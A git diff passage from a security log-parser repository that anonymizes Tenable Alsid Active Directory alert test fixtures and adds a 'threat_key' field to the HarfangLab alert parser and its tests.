"\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-NATIVE-ADM-GROUP-MEMBERS\" \"critical\" \"CN=Main Administrators,CN=Users,DC=emea,DC=corp\" \"1959337\" \"2\" \"R-NOT-IN-WHITELIST\" \"51204253\" \"AccountCn\"=\"John Doe (Admin Root)\" \"GroupCn\"=\"Main Administrators\" \"PrivilegesPath\"=\"CN=Main Administrators,CN=Users,DC=emea,DC=corp\"", + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-NATIVE-ADM-GROUP-MEMBERS\" \"critical\" \"CN=Main Administrators,CN=Users,DC=test,DC=corp\" \"1959000\" \"2\" \"R-NOT-IN-WHITELIST\" \"51200000\" \"AccountCn\"=\"John Doe (Admin Root)\" \"GroupCn\"=\"Main Administrators\" \"PrivilegesPath\"=\"CN=Main Administrators,CN=Users,DC=test,DC=corp\"", "event": { "kind": "alert", "outcome": "success" @@ -13,14 +13,14 @@ "outcome": "success", "outcome_reason": "R-NOT-IN-WHITELIST", "properties": { - "ADdevianceID": 1959337, - "ADdomainName": "emea.corp", + "ADdevianceID": 1959000, + "ADdomainName": "test.corp", "ADforestName": "Alsid Forest", - "ADobject": "CN=Main Administrators,CN=Users,DC=emea,DC=corp", - "PrivilegesPath": "CN=Main Administrators,CN=Users,DC=emea,DC=corp", + "ADobject": "CN=Main Administrators,CN=Users,DC=test,DC=corp", + "PrivilegesPath": "CN=Main Administrators,CN=Users,DC=test,DC=corp", "alertID": 1, "alertSeverityLevel": "critical", - "eventID": "51204253" + "eventID": "51200000" }, "type": "alert" }, diff --git a/Tenable/alsid/tests/event_4.json b/Tenable/alsid/tests/event_4.json index 418ddd8b1..d3deeae5d 100644 --- a/Tenable/alsid/tests/event_4.json +++ b/Tenable/alsid/tests/event_4.json @@ -1,9 +1,9 @@ { "input": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-ADMIN-RESTRICT-AUTH\" \"high\" \"OU=D528,OU=Desktops,OU=Computers,DC=emae,DC=corp\" \"1958033\" \"2\" \"R-PRIVUSER-CAN-LOGON-ACROSS-TRUST\" \"49271575\" \"UserCn\"=\"John Doe (Admin Root)\" \"UserDomain\"=\"emea.corp\" \"PrivilegesPath\"=\"CN=Main Administrators,CN=Users,DC=emea,DC=corp\" \"ParentContainer\"=\"OU=D528,OU=Desktops,OU=Computers,DC=emae,DC=corp\"" + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-ADMIN-RESTRICT-AUTH\" \"high\" \"OU=test_OU,OU=Desktops,OU=Computers,DC=test_DC,DC=corp\" \"1958000\" \"2\" \"R-PRIVUSER-CAN-LOGON-ACROSS-TRUST\" \"49271000\" \"UserCn\"=\"John Doe (Admin Root)\" \"UserDomain\"=\"test.corp\" \"PrivilegesPath\"=\"CN=Main Administrators,CN=Users,DC=test,DC=corp\" \"ParentContainer\"=\"OU=D000,OU=Desktops,OU=Computers,DC=test,DC=corp\"" }, "expected": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-ADMIN-RESTRICT-AUTH\" \"high\" \"OU=D528,OU=Desktops,OU=Computers,DC=emae,DC=corp\" \"1958033\" \"2\" \"R-PRIVUSER-CAN-LOGON-ACROSS-TRUST\" \"49271575\" \"UserCn\"=\"John Doe (Admin Root)\" \"UserDomain\"=\"emea.corp\" \"PrivilegesPath\"=\"CN=Main Administrators,CN=Users,DC=emea,DC=corp\" \"ParentContainer\"=\"OU=D528,OU=Desktops,OU=Computers,DC=emae,DC=corp\"", + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-ADMIN-RESTRICT-AUTH\" \"high\" \"OU=test_OU,OU=Desktops,OU=Computers,DC=test_DC,DC=corp\" \"1958000\" \"2\" \"R-PRIVUSER-CAN-LOGON-ACROSS-TRUST\" \"49271000\" \"UserCn\"=\"John Doe (Admin Root)\" \"UserDomain\"=\"test.corp\" \"PrivilegesPath\"=\"CN=Main Administrators,CN=Users,DC=test,DC=corp\" \"ParentContainer\"=\"OU=D000,OU=Desktops,OU=Computers,DC=test,DC=corp\"", "event": { "kind": "alert", "outcome": "success" @@ -13,15 +13,15 @@ "outcome": "success", "outcome_reason": "R-PRIVUSER-CAN-LOGON-ACROSS-TRUST", "properties": { - "ADdevianceID": 1958033, - "ADdomainName": "emea.corp", + "ADdevianceID": 1958000, + "ADdomainName": "test.corp", "ADforestName": "Alsid Forest", - "ADobject": "OU=D528,OU=Desktops,OU=Computers,DC=emae,DC=corp", - "ParentContainer": "OU=D528,OU=Desktops,OU=Computers,DC=emae,DC=corp", - "PrivilegesPath": "CN=Main Administrators,CN=Users,DC=emea,DC=corp", + "ADobject": "OU=test_OU,OU=Desktops,OU=Computers,DC=test_DC,DC=corp", + "ParentContainer": "OU=D000,OU=Desktops,OU=Computers,DC=test,DC=corp", + "PrivilegesPath": "CN=Main Administrators,CN=Users,DC=test,DC=corp", "alertID": 1, "alertSeverityLevel": "high", - "eventID": "49271575" + "eventID": "49271000" }, "type": "alert" }, @@ -35,7 +35,7 @@ "type": "ldap" }, "user": { - "domain": "emea.corp", + "domain": "test.corp", "name": "John Doe" } } diff --git a/Tenable/alsid/tests/ioe_security_alert1.json b/Tenable/alsid/tests/ioe_security_alert1.json index b149081cb..dbe95b13a 100644 --- a/Tenable/alsid/tests/ioe_security_alert1.json +++ b/Tenable/alsid/tests/ioe_security_alert1.json @@ -1,9 +1,9 @@ { "input": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-PASSWORD-DONT-EXPIRE\" \"medium\" \"CN=Gustavo Fring,OU=Los_Pollos_Hermanos,OU=Emea,DC=emea,DC=corp\" \"28\" \"1\" \"R-DONT-EXPIRE-SET\" \"2434\" \"TrusteeCn\"=\"GustavoFring\"" + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-PASSWORD-DONT-EXPIRE\" \"medium\" \"CN=John Doe,OU=test_OU,OU=test_ou1,DC=test_DC,DC=corp\" \"28\" \"1\" \"R-DONT-EXPIRE-SET\" \"2400\" \"TrusteeCn\"=\"JohnDoe\"" }, "expected": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-PASSWORD-DONT-EXPIRE\" \"medium\" \"CN=Gustavo Fring,OU=Los_Pollos_Hermanos,OU=Emea,DC=emea,DC=corp\" \"28\" \"1\" \"R-DONT-EXPIRE-SET\" \"2434\" \"TrusteeCn\"=\"GustavoFring\"", + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-PASSWORD-DONT-EXPIRE\" \"medium\" \"CN=John Doe,OU=test_OU,OU=test_ou1,DC=test_DC,DC=corp\" \"28\" \"1\" \"R-DONT-EXPIRE-SET\" \"2400\" \"TrusteeCn\"=\"JohnDoe\"", "event": { "kind": "alert", "outcome": "success" @@ -14,13 +14,13 @@ "outcome_reason": "R-DONT-EXPIRE-SET", "properties": { "ADdevianceID": 28, - "ADdomainName": "emea.corp", + "ADdomainName": "test.corp", "ADforestName": "Alsid Forest", - "ADobject": "CN=Gustavo Fring,OU=Los_Pollos_Hermanos,OU=Emea,DC=emea,DC=corp", - "TrusteeCn": "GustavoFring", + "ADobject": "CN=John Doe,OU=test_OU,OU=test_ou1,DC=test_DC,DC=corp", + "TrusteeCn": "JohnDoe", "alertID": 1, "alertSeverityLevel": "medium", - "eventID": "2434" + "eventID": "2400" }, "type": "alert" }, diff --git a/Tenable/alsid/tests/ioe_security_alert3.json b/Tenable/alsid/tests/ioe_security_alert3.json index abfdf8cc5..dd4f9ac7f 100644 --- a/Tenable/alsid/tests/ioe_security_alert3.json +++ b/Tenable/alsid/tests/ioe_security_alert3.json @@ -1,9 +1,9 @@ { "input": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-PASSWORD-DONT-EXPIRE\" \"medium\" \"CN=Gustavo Fring,OU=Los_Pollos_Hermanos,OU=Emea,DC=emea,DC=corp\" \"28\" \"1\" \"R-DONT-EXPIRE-SET\" \"2434\"" + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-PASSWORD-DONT-EXPIRE\" \"medium\" \"CN=John Doe,OU=test_OU,OU=test_ou1,DC=test_DC,DC=corp\" \"28\" \"1\" \"R-DONT-EXPIRE-SET\" \"2400\"" }, "expected": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-PASSWORD-DONT-EXPIRE\" \"medium\" \"CN=Gustavo Fring,OU=Los_Pollos_Hermanos,OU=Emea,DC=emea,DC=corp\" \"28\" \"1\" \"R-DONT-EXPIRE-SET\" \"2434\"", + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-PASSWORD-DONT-EXPIRE\" \"medium\" \"CN=John Doe,OU=test_OU,OU=test_ou1,DC=test_DC,DC=corp\" \"28\" \"1\" \"R-DONT-EXPIRE-SET\" \"2400\"", "event": { "kind": "alert", "outcome": "success" @@ -14,12 +14,12 @@ "outcome_reason": "R-DONT-EXPIRE-SET", "properties": { "ADdevianceID": 28, - "ADdomainName": "emea.corp", + "ADdomainName": "test.corp", "ADforestName": "Alsid Forest", - "ADobject": "CN=Gustavo Fring,OU=Los_Pollos_Hermanos,OU=Emea,DC=emea,DC=corp", + "ADobject": "CN=John Doe,OU=test_OU,OU=test_ou1,DC=test_DC,DC=corp", "alertID": 1, "alertSeverityLevel": "medium", - "eventID": "2434" + "eventID": "2400" }, "type": "alert" }, diff --git a/Tenable/alsid/tests/ioe_security_alert4.json b/Tenable/alsid/tests/ioe_security_alert4.json index 4b340737e..6c89b301f 100644 --- a/Tenable/alsid/tests/ioe_security_alert4.json +++ b/Tenable/alsid/tests/ioe_security_alert4.json @@ -1,9 +1,9 @@ { "input": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-PASSWORD-POLICY\" \"critical\" \"OU=ORG,OU=Example,OU=Computers,OU=NDFRE,DC=emea,DC=corp\" \"28\" \"2\" \"R-LOCAL-ACCOUNTS-PWD-INHERITANCE-BLOCKED\" \"2434\" \"AttributeName\"=\"inf-system_access-lockoutbadcount\" \"OuCn\"=\"Packaging\"\n" + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-PASSWORD-POLICY\" \"critical\" \"OU=ORG,OU=Example,OU=Computers,OU=NDFRE,DC=test,DC=corp\" \"28\" \"2\" \"R-LOCAL-ACCOUNTS-PWD-INHERITANCE-BLOCKED\" \"2434\" \"AttributeName\"=\"inf-system_access-lockoutbadcount\" \"OuCn\"=\"Packaging\"\n" }, "expected": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-PASSWORD-POLICY\" \"critical\" \"OU=ORG,OU=Example,OU=Computers,OU=NDFRE,DC=emea,DC=corp\" \"28\" \"2\" \"R-LOCAL-ACCOUNTS-PWD-INHERITANCE-BLOCKED\" \"2434\" \"AttributeName\"=\"inf-system_access-lockoutbadcount\" \"OuCn\"=\"Packaging\"\n", + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-PASSWORD-POLICY\" \"critical\" \"OU=ORG,OU=Example,OU=Computers,OU=NDFRE,DC=test,DC=corp\" \"28\" \"2\" \"R-LOCAL-ACCOUNTS-PWD-INHERITANCE-BLOCKED\" \"2434\" \"AttributeName\"=\"inf-system_access-lockoutbadcount\" \"OuCn\"=\"Packaging\"\n", "event": { "kind": "alert", "outcome": "success" @@ -14,9 +14,9 @@ "outcome_reason": "R-LOCAL-ACCOUNTS-PWD-INHERITANCE-BLOCKED", "properties": { "ADdevianceID": 28, - "ADdomainName": "emea.corp", + "ADdomainName": "test.corp", "ADforestName": "Alsid Forest", - "ADobject": "OU=ORG,OU=Example,OU=Computers,OU=NDFRE,DC=emea,DC=corp", + "ADobject": "OU=ORG,OU=Example,OU=Computers,OU=NDFRE,DC=test,DC=corp", "AttributeName": "inf-system_access-lockoutbadcount", "OuCn": "Packaging", "alertID": 1, diff --git a/Tenable/alsid/tests/trailflow_alert1.json b/Tenable/alsid/tests/trailflow_alert1.json index 2fa82823e..b41cd7fcc 100644 --- a/Tenable/alsid/tests/trailflow_alert1.json +++ b/Tenable/alsid/tests/trailflow_alert1.json @@ -1,9 +1,9 @@ { "input": { - "message": "\"1\" \"1\" \"Alsid Forest\" \"emea.corp\" \"CN=Gustavo Fring,OU=Los_Pollos_Hermanos,OU=Emea,DC=Emea,DC=corp\" \"2434\" \"UAC changed\" whenchanged=\"\"2020-01-09T09:24:41.0000000Z\"\"" + "message": "\"1\" \"1\" \"Alsid Forest\" \"test.corp\" \"CN=John doe,OU=test_OU,OU=test_OU1,DC=test_DC,DC=corp\" \"2400\" \"UAC changed\" whenchanged=\"\"2020-01-09T09:24:41.0000000Z\"\"" }, "expected": { - "message": "\"1\" \"1\" \"Alsid Forest\" \"emea.corp\" \"CN=Gustavo Fring,OU=Los_Pollos_Hermanos,OU=Emea,DC=Emea,DC=corp\" \"2434\" \"UAC changed\" whenchanged=\"\"2020-01-09T09:24:41.0000000Z\"\"", + "message": "\"1\" \"1\" \"Alsid Forest\" \"test.corp\" \"CN=John doe,OU=test_OU,OU=test_OU1,DC=test_DC,DC=corp\" \"2400\" \"UAC changed\" whenchanged=\"\"2020-01-09T09:24:41.0000000Z\"\"", "event": { "kind": "trailflow", "outcome": "success" @@ -12,13 +12,13 @@ "name": "UAC changed", "outcome": "success", "properties": { - "ADdomainName": "emea.corp", + "ADdomainName": "test.corp", "ADforestName": "Alsid Forest", - "ADobject": "CN=Gustavo Fring,OU=Los_Pollos_Hermanos,OU=Emea,DC=Emea,DC=corp", + "ADobject": "CN=John doe,OU=test_OU,OU=test_OU1,DC=test_DC,DC=corp", "alertID": 1, "alsidAttributeName": "whenchanged", "alsidAttributeValue": "\"2020-01-09T09:24:41.0000000Z\"", - "eventID": "2434", + "eventID": "2400", "eventType": "UAC changed" }, "type": "trailflow" diff --git a/Tenable/alsid/tests/trailflow_alert2.json b/Tenable/alsid/tests/trailflow_alert2.json index a26f52b7b..38f57b925 100644 --- a/Tenable/alsid/tests/trailflow_alert2.json +++ b/Tenable/alsid/tests/trailflow_alert2.json @@ -1,9 +1,9 @@ { "input": { - "message": "\"1\" \"1\" \"Alsid Forest\" \"emea.corp\" \"CN=Gustavo Fring,OU=Los_Pollos_Hermanos,OU=Emea,DC=emea,DC=corp\" \"2432\" \"UAC changed\" useraccountcontrol=\"\"DONT_EXPIRE NORMAL \"\"" + "message": "\"1\" \"1\" \"Alsid Forest\" \"test.corp\" \"CN=John Doe,OU=test_OU,OU=test_OU2,DC=test_DC,DC=corp\" \"2400\" \"UAC changed\" useraccountcontrol=\"\"DONT_EXPIRE NORMAL \"\"" }, "expected": { - "message": "\"1\" \"1\" \"Alsid Forest\" \"emea.corp\" \"CN=Gustavo Fring,OU=Los_Pollos_Hermanos,OU=Emea,DC=emea,DC=corp\" \"2432\" \"UAC changed\" useraccountcontrol=\"\"DONT_EXPIRE NORMAL \"\"", + "message": "\"1\" \"1\" \"Alsid Forest\" \"test.corp\" \"CN=John Doe,OU=test_OU,OU=test_OU2,DC=test_DC,DC=corp\" \"2400\" \"UAC changed\" useraccountcontrol=\"\"DONT_EXPIRE NORMAL \"\"", "event": { "kind": "trailflow", "outcome": "success" @@ -12,13 +12,13 @@ "name": "UAC changed", "outcome": "success", "properties": { - "ADdomainName": "emea.corp", + "ADdomainName": "test.corp", "ADforestName": "Alsid Forest", - "ADobject": "CN=Gustavo Fring,OU=Los_Pollos_Hermanos,OU=Emea,DC=emea,DC=corp", + "ADobject": "CN=John Doe,OU=test_OU,OU=test_OU2,DC=test_DC,DC=corp", "alertID": 1, "alsidAttributeName": "useraccountcontrol", "alsidAttributeValue": "\"DONT_EXPIRE NORMAL \"", - "eventID": "2432", + "eventID": "2400", "eventType": "UAC changed" }, "type": "trailflow" diff --git a/Tenable/alsid/tests/trailflow_alert3.json b/Tenable/alsid/tests/trailflow_alert3.json index 0d3b1d784..b073ae6e5 100644 --- a/Tenable/alsid/tests/trailflow_alert3.json +++ b/Tenable/alsid/tests/trailflow_alert3.json @@ -1,9 +1,9 @@ { "input": { - "message": "\"1\" \"8\" \"AD.FOOBAR.COM\" \"AD\" \"\\\\AD.FOOBAR.COM\\sysvol\\AD.FOOBAR.COM\\Policies\\{SEK01A10-T35T-TEST-T35T-5EKO1AIO10}\\User\\Scripts\" \"7856795\" \"ACL change\" \"ntsecuritydescriptor\"=\"\"O:S-1-5-21-1519513455-2607746426-5380147357-40655D:AI(A;OICIID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-512)(A;OICIID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-519)(A;OICIID;0x1200a9;;;S-1-5-11)(A;OICIID;0x1200a9;;;S-1-5-9)(A;OICIID;FA;;;S-1-5-18)(A;ID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-40655)(A;OICIIOID;FA;;;S-1-3-0)\"\"" + "message": "\"1\" \"8\" \"AD.TEST.COM\" \"AD\" \"\\\\AD.TEST.COM\\sysvol\\AD.TEST.COM\\Policies\\{SEK01A10-T35T-TEST-T35T-5EKO1AIO10}\\User\\Scripts\" \"7856000\" \"ACL change\" \"ntsecuritydescriptor\"=\"\"O:S-1-5-21-1519513455-2607000000-5380140000-406000:AI(A;OICIID;FA;;;S-1-5-21-1519510000-2607746426-5380147357-512)(A;OICIID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-519)(A;OICIID;0x1200a9;;;S-1-5-11)(A;OICIID;0x1200a9;;;S-1-5-9)(A;OICIID;FA;;;S-1-5-18)(A;ID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-40655)(A;OICIIOID;FA;;;S-1-3-0)\"\"" }, "expected": { - "message": "\"1\" \"8\" \"AD.FOOBAR.COM\" \"AD\" \"\\\\AD.FOOBAR.COM\\sysvol\\AD.FOOBAR.COM\\Policies\\{SEK01A10-T35T-TEST-T35T-5EKO1AIO10}\\User\\Scripts\" \"7856795\" \"ACL change\" \"ntsecuritydescriptor\"=\"\"O:S-1-5-21-1519513455-2607746426-5380147357-40655D:AI(A;OICIID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-512)(A;OICIID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-519)(A;OICIID;0x1200a9;;;S-1-5-11)(A;OICIID;0x1200a9;;;S-1-5-9)(A;OICIID;FA;;;S-1-5-18)(A;ID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-40655)(A;OICIIOID;FA;;;S-1-3-0)\"\"", + "message": "\"1\" \"8\" \"AD.TEST.COM\" \"AD\" \"\\\\AD.TEST.COM\\sysvol\\AD.TEST.COM\\Policies\\{SEK01A10-T35T-TEST-T35T-5EKO1AIO10}\\User\\Scripts\" \"7856000\" \"ACL change\" \"ntsecuritydescriptor\"=\"\"O:S-1-5-21-1519513455-2607000000-5380140000-406000:AI(A;OICIID;FA;;;S-1-5-21-1519510000-2607746426-5380147357-512)(A;OICIID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-519)(A;OICIID;0x1200a9;;;S-1-5-11)(A;OICIID;0x1200a9;;;S-1-5-9)(A;OICIID;FA;;;S-1-5-18)(A;ID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-40655)(A;OICIIOID;FA;;;S-1-3-0)\"\"", "event": { "kind": "trailflow", "outcome": "success" @@ -13,12 +13,12 @@ "outcome": "success", "properties": { "ADdomainName": "AD", - "ADforestName": "AD.FOOBAR.COM", - "ADobject": "\\\\AD.FOOBAR.COM\\sysvol\\AD.FOOBAR.COM\\Policies\\{SEK01A10-T35T-TEST-T35T-5EKO1AIO10}\\User\\Scripts", + "ADforestName": "AD.TEST.COM", + "ADobject": "\\\\AD.TEST.COM\\sysvol\\AD.TEST.COM\\Policies\\{SEK01A10-T35T-TEST-T35T-5EKO1AIO10}\\User\\Scripts", "alertID": 8, "alsidAttributeName": "\"ntsecuritydescriptor\"", - "alsidAttributeValue": "\"O:S-1-5-21-1519513455-2607746426-5380147357-40655D:AI(A;OICIID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-512)(A;OICIID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-519)(A;OICIID;0x1200a9;;;S-1-5-11)(A;OICIID;0x1200a9;;;S-1-5-9)(A;OICIID;FA;;;S-1-5-18)(A;ID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-40655)(A;OICIIOID;FA;;;S-1-3-0)\"", - "eventID": "7856795", + "alsidAttributeValue": "\"O:S-1-5-21-1519513455-2607000000-5380140000-406000:AI(A;OICIID;FA;;;S-1-5-21-1519510000-2607746426-5380147357-512)(A;OICIID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-519)(A;OICIID;0x1200a9;;;S-1-5-11)(A;OICIID;0x1200a9;;;S-1-5-9)(A;OICIID;FA;;;S-1-5-18)(A;ID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-40655)(A;OICIIOID;FA;;;S-1-3-0)\"", + "eventID": "7856000", "eventType": "ACL change" }, "type": "trailflow" diff --git a/Tenable/alsid/tests/trailflow_alert4.json b/Tenable/alsid/tests/trailflow_alert4.json index 1d4ae660f..a2179f541 100644 --- a/Tenable/alsid/tests/trailflow_alert4.json +++ b/Tenable/alsid/tests/trailflow_alert4.json @@ -1,9 +1,9 @@ { "input": { - "message": "\"1\" \"8\" \"AD.FOOBAR.COM\" \"AD\" \"\\\\AD.FOOBAR.COM\\sysvol\\AD.FOOBAR.COM\\Policies\\{SEK01A10-T35T-TEST-T35T-5EKO1AIO10}\\GPT.INI\" \"7855399\" \"New object\" \"gptini-displayname\"=\"\"Nouvel objet Strat\u00e9gie de groupe\"\"" + "message": "\"1\" \"8\" \"AD.TEST.COM\" \"AD\" \"\\\\AD.TEST.COM\\sysvol\\AD.TEST.COM\\Policies\\{SEK01A10-T35T-TEST-T35T-5EKO1AIO10}\\GPT.INI\" \"7855000\" \"New object\" \"gptini-displayname\"=\"\"Nouvel objet Strat\u00e9gie de groupe\"\"" }, "expected": { - "message": "\"1\" \"8\" \"AD.FOOBAR.COM\" \"AD\" \"\\\\AD.FOOBAR.COM\\sysvol\\AD.FOOBAR.COM\\Policies\\{SEK01A10-T35T-TEST-T35T-5EKO1AIO10}\\GPT.INI\" \"7855399\" \"New object\" \"gptini-displayname\"=\"\"Nouvel objet Strat\u00e9gie de groupe\"\"", + "message": "\"1\" \"8\" \"AD.TEST.COM\" \"AD\" \"\\\\AD.TEST.COM\\sysvol\\AD.TEST.COM\\Policies\\{SEK01A10-T35T-TEST-T35T-5EKO1AIO10}\\GPT.INI\" \"7855000\" \"New object\" \"gptini-displayname\"=\"\"Nouvel objet Strat\u00e9gie de groupe\"\"", "event": { "kind": "trailflow", "outcome": "success" @@ -13,12 +13,12 @@ "outcome": "success", "properties": { "ADdomainName": "AD", - "ADforestName": "AD.FOOBAR.COM", - "ADobject": "\\\\AD.FOOBAR.COM\\sysvol\\AD.FOOBAR.COM\\Policies\\{SEK01A10-T35T-TEST-T35T-5EKO1AIO10}\\GPT.INI", + "ADforestName": "AD.TEST.COM", + "ADobject": "\\\\AD.TEST.COM\\sysvol\\AD.TEST.COM\\Policies\\{SEK01A10-T35T-TEST-T35T-5EKO1AIO10}\\GPT.INI", "alertID": 8, "alsidAttributeName": "\"gptini-displayname\"", "alsidAttributeValue": "\"Nouvel objet Strat\u00e9gie de groupe\"", - "eventID": "7855399", + "eventID": "7855000", "eventType": "New object" }, "type": "trailflow" From a0bfdeaa4f061e8fdff21bfb70487d3e519f6135 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Mon, 16 Dec 2024 16:16:30 +0100 Subject: [PATCH 150/150] HarfangLab: Adding field for Harfanglab Threat Key --- HarfangLab/harfanglab/_meta/fields.yml | 5 +++++ HarfangLab/harfanglab/ingest/parser.yml | 1 + HarfangLab/harfanglab/tests/alert_1.json | 3 ++- HarfangLab/harfanglab/tests/alert_2.json | 3 ++- HarfangLab/harfanglab/tests/alert_3.json | 3 ++- HarfangLab/harfanglab/tests/alert_4.json | 3 ++- HarfangLab/harfanglab/tests/alert_5.json | 3 ++- 7 files changed, 16 insertions(+), 5 deletions(-) diff --git a/HarfangLab/harfanglab/_meta/fields.yml b/HarfangLab/harfanglab/_meta/fields.yml index 902363c55..1ad5ffb1e 100644 --- a/HarfangLab/harfanglab/_meta/fields.yml +++ b/HarfangLab/harfanglab/_meta/fields.yml @@ -1043,6 +1043,11 @@ harfanglab.threat_id: name: harfanglab.threat_id type: keyword +harfanglab.threat_key: + description: The key of the threat + name: harfanglab.threat_key + type: keyword + network.direction: description: The direction of the network connection name: network.direction diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml index 253355fce..2b8fb9c96 100644 --- a/HarfangLab/harfanglab/ingest/parser.yml +++ b/HarfangLab/harfanglab/ingest/parser.yml @@ -266,6 +266,7 @@ stages: harfanglab.aggregation_key: "{{json_event.message.aggregation_key}}" harfanglab.process.powershell.command: "{{json_event.message.details_powershell.PowershellCommand}}" harfanglab.process.powershell.script_path: "{{json_event.message.details_powershell.PowershellScriptPath}}" + harfanglab.threat_key: "{{json_event.message.threat_key}}" alert_process_info: actions: diff --git a/HarfangLab/harfanglab/tests/alert_1.json b/HarfangLab/harfanglab/tests/alert_1.json index 9ac1abc0a..484cfee47 100644 --- a/HarfangLab/harfanglab/tests/alert_1.json +++ b/HarfangLab/harfanglab/tests/alert_1.json @@ -35,7 +35,8 @@ "execution": 0, "groups": [], "level": "medium", - "status": "new" + "status": "new", + "threat_key": "2971" }, "host": { "domain": "EXAMPLE", diff --git a/HarfangLab/harfanglab/tests/alert_2.json b/HarfangLab/harfanglab/tests/alert_2.json index 60c039be7..ffb3dd936 100644 --- a/HarfangLab/harfanglab/tests/alert_2.json +++ b/HarfangLab/harfanglab/tests/alert_2.json @@ -35,7 +35,8 @@ "{\"id\": \"00000000-0000-0000-0000-000000000000\", \"name\": \"EXAMPLE\"}" ], "level": "medium", - "status": "new" + "status": "new", + "threat_key": "2912" }, "host": { "domain": "EXAMPLE", diff --git a/HarfangLab/harfanglab/tests/alert_3.json b/HarfangLab/harfanglab/tests/alert_3.json index f37d2fad4..4ea4e0884 100644 --- a/HarfangLab/harfanglab/tests/alert_3.json +++ b/HarfangLab/harfanglab/tests/alert_3.json @@ -42,7 +42,8 @@ "script_path": "C:\\Scripts\\SomeWhere\\Get-FaInterco\\Get-FaNetworkFlowV2.ps1" } }, - "status": "new" + "status": "new", + "threat_key": "16364" }, "host": { "domain": "Example", diff --git a/HarfangLab/harfanglab/tests/alert_4.json b/HarfangLab/harfanglab/tests/alert_4.json index 1a45b2b22..c0c748a53 100644 --- a/HarfangLab/harfanglab/tests/alert_4.json +++ b/HarfangLab/harfanglab/tests/alert_4.json @@ -42,7 +42,8 @@ "{\"id\": \"12345678-abcd-ef90-1234-123456abcdef\", \"name\": \"DOMAIN_Postes_de_travail_Windows\"}" ], "level": "medium", - "status": "new" + "status": "new", + "threat_key": "1343" }, "host": { "domain": "DOMAINSI", diff --git a/HarfangLab/harfanglab/tests/alert_5.json b/HarfangLab/harfanglab/tests/alert_5.json index 19abfe567..3202a7f54 100644 --- a/HarfangLab/harfanglab/tests/alert_5.json +++ b/HarfangLab/harfanglab/tests/alert_5.json @@ -45,7 +45,8 @@ "{\"id\": \"66666666-7777-8888-9999-000000000000\", \"name\": \"Postes de travail : Lot 3\"}" ], "level": "medium", - "status": "new" + "status": "new", + "threat_key": "20528" }, "host": { "domain": "NT_DOMAIN",